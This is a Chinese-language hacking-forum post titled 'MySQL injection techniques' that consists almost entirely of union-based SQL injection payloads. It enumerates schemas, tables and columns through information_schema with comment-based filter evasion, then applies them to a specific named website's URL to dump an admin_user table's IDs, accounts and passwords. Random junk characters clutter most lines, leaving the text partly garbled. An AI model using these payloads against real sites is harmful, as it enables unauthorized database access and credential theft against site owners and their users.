中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]

作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库
- `5 z/ _- Z* \7 N# p6 \1 k# `, V' t
" O/ n+ V: G/ z# a; W& kid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*2 `9 S& L2 w' d8 A2 ]6 r( S

6 j7 M% X# D2 G8 O$ p查表
* u& D$ U5 _1 Z3 M
+ T2 _! u7 Z9 q8 E3 z( e- ?id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
0 }! b# ]- W# p( ]1 ^) S' T) j
* {: q1 Q- ^0 s% r查段
. M: ~- j) p/ {" b& S  E: t2 H* F; q: W. C! w8 s. ]
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1' v; n( o5 m/ N# N7 s5 v
) K# J8 \% n2 R) o
% r# F) j9 v! D; ?9 U
mysql5高级注入方法暴表# k! l, P2 n8 j. R  N7 Y. \

: o+ G- f1 T2 T: ~例子如下:
; w: e# j2 {( ]% Z* X
4 e, e6 X9 ~# w$ {2 I7 y1.爆表
5 V7 F7 i0 O8 {9 f: Qhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)+ F# g, X" }: L, p7 }$ ]: f
这样爆到第4个时出现了admin_user表。
( Y4 x, k1 Q! v$ r2 g) P; U5 u: ^* o9 ~, M; L# C; T$ v
2.暴字段/ B1 s# C/ r" \0 s7 K
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*7 ?! Y* W4 d0 C$ e
% x/ Y6 X# B4 P5 X

! n7 T2 K$ [3 Y# g3.爆密码6 \+ O  q3 v: d3 j) G
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 9 \% v7 [1 M/ Z& V
/ B8 |! S; {4 O3 m: m) @
, q7 @* b* I5 i0 V6 i, H; P9 ?





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2